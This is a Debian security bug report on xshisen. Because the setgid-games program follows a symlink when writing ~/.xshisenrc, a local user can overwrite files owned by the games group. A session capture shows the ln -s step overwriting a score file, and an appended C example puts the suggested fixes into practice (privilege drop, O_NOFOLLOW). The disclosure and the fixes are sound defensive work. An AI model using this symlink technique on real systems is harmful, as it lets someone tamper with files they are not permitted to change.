Subject: ~/.xshisenrc owned by group games, follows symlinks
Package: xshisen
Version: 1.51-1-1.1
Severity: important
Tags: security

Hello,

xshisen writes a ~/.xshisenrc file with configuration information. The program
is setgid games, so the .xshisenrc file ends up being owned by group games, and
the program follows symlinks when writing it. This adds up to a local user
being able to overwrite files owned by group games and create new files where
the games group is allowed to do so.

To test this, you simply create a symlink, start xshisen, change some
configuration settings, start playing and then exit the program. An example
can be found in this session capture:


[EMAIL PROTECTED]:~$ cat /var/games/rockdodger.scores
109782 Ulf
29846 Ulf
13000 Pad
12500 Pad
6500 Pad
5000 Pad
3000 Pad
2500 Pad
[EMAIL PROTECTED]:~$ ln -s /var/games/rockdodger.scores .xshisenrc
[EMAIL PROTECTED]:~$ ls -al .xshisenrc
lrwxrwxrwx  1 metaur metaur 28 2005-01-21 20:36 .xshisenrc -> /var/games/rockdodger.scores
[EMAIL PROTECTED]:~$ xshisen
[EMAIL PROTECTED]:~$ cat /var/games/rockdodger.scores
XShisen*gameSize: 0
XShisen*trialMode: false
XShisen*gravityMode: true
XShisen*imageSet: 2
[EMAIL PROTECTED]:~$


I suggest fixing this by either dropping privileges when writing .xshisenrc or
making sure that .xshisenrc isn't a symlink.

// Ulf Harnhammar

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages xshisen depends on:
ii  libc6                    2.3.2.ds1-20    GNU C Library: Shared libraries an
ii  libgcc1                  1:3.4.3-6       GCC support library
ii  libice6                  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  libsm6                   4.3.0.dfsg.1-10 X Window System Session Management
ii  libstdc++5               1:3.3.5-5       The GNU Standard C++ Library v3
ii  libx11-6                 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxaw7                  4.3.0.dfsg.1-10 X Athena widget set library
ii  libxmu6                  4.3.0.dfsg.1-10 X Window System miscellaneous util
ii  libxpm4                  4.3.0.dfsg.1-10 X pixmap library
ii  libxt6                   4.3.0.dfsg.1-10 X Toolkit Intrinsics
ii  xlibs                    4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu

-- no debconf information
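The two fixes suggested in the report (dropping the setgid privilege before the write, or refusing to write through a symlink), as an added example in C. This is not code from the bug report or from xshisen itself; the function names and the temporary directory under /tmp are assumptions made for illustration, and the score file and symlink it creates are constructed inline to mirror the session capture above.

```c
/*
 * Added example, not from the xshisen package or the bug report.
 * Two independent defences for a setgid program writing a per-user rc file:
 *   1. drop the setgid privilege (effective gid := real gid) before writing;
 *   2. open with O_NOFOLLOW so a symlink at the final path component is
 *      refused with ELOOP instead of being followed.
 * drop_setgid(), write_rc_nofollow() and demo_symlink_refused() are
 * illustrative names, not xshisen functions.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Defence 1: make real, effective (and on Linux, saved) gid equal to the
 * real gid, so a later write carries only the user's own group.
 * Returns 0 on success, -1 on failure. */
int drop_setgid(void)
{
    gid_t rgid = getgid();
    if (setregid(rgid, rgid) != 0)
        return -1;
    /* Verify the drop actually took effect. */
    return (getegid() == rgid) ? 0 : -1;
}

/* Defence 2: write `data` to `path` without following a symlink at the
 * final component. Returns 0 on success, -1 with errno set on failure
 * (errno == ELOOP when `path` is a symlink). */
int write_rc_nofollow(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    size_t len = strlen(data);
    ssize_t n = write(fd, data, len);
    int saved = errno;
    close(fd);
    if (n < 0 || (size_t)n != len) {
        errno = saved;
        return -1;
    }
    return 0;
}

/* Constructed reproduction of the report under a mkdtemp() directory:
 * a "score file" and a user-planted .xshisenrc symlink pointing at it.
 * Returns 1 if the direct write succeeds, the write through the symlink
 * is refused with ELOOP, and the score file is left untouched; else 0. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/xshisen-demo-XXXXXX";   /* assumed location */
    char target[256], link[256], buf[64] = {0};
    int ok = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/rockdodger.scores", dir);
    snprintf(link, sizeof link, "%s/.xshisenrc", dir);

    /* Constructed stand-in for the group-writable score file. */
    if (write_rc_nofollow(target, "109782 Ulf\n") != 0) goto out;
    /* The attacker's step: ln -s /var/games/rockdodger.scores .xshisenrc */
    if (symlink(target, link) != 0) goto out;

    /* The program's write through the symlink must now fail. */
    errno = 0;
    int rc = write_rc_nofollow(link, "XShisen*gameSize: 0\n");
    int err = errno;

    /* The target must still hold the original scores. */
    int fd = open(target, O_RDONLY);
    if (fd >= 0) {
        ssize_t r = read(fd, buf, sizeof buf - 1);
        if (r > 0) buf[r] = '\0';
        close(fd);
    }
    ok = (rc == -1 && err == ELOOP && strcmp(buf, "109782 Ulf\n") == 0);
out:
    unlink(link);
    unlink(target);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("symlink write refused: %s\n", demo_symlink_refused() ? "yes" : "no");
    printf("setgid dropped: %s\n", drop_setgid() == 0 ? "yes" : "no");
    return 0;
}
```

O_NOFOLLOW only guards the last path component; if a parent directory on the way to ~/.xshisenrc is itself a symlink it is still followed, so dropping the setgid privilege before any write to user-controlled paths is the more complete of the two fixes, and the two combine without conflict.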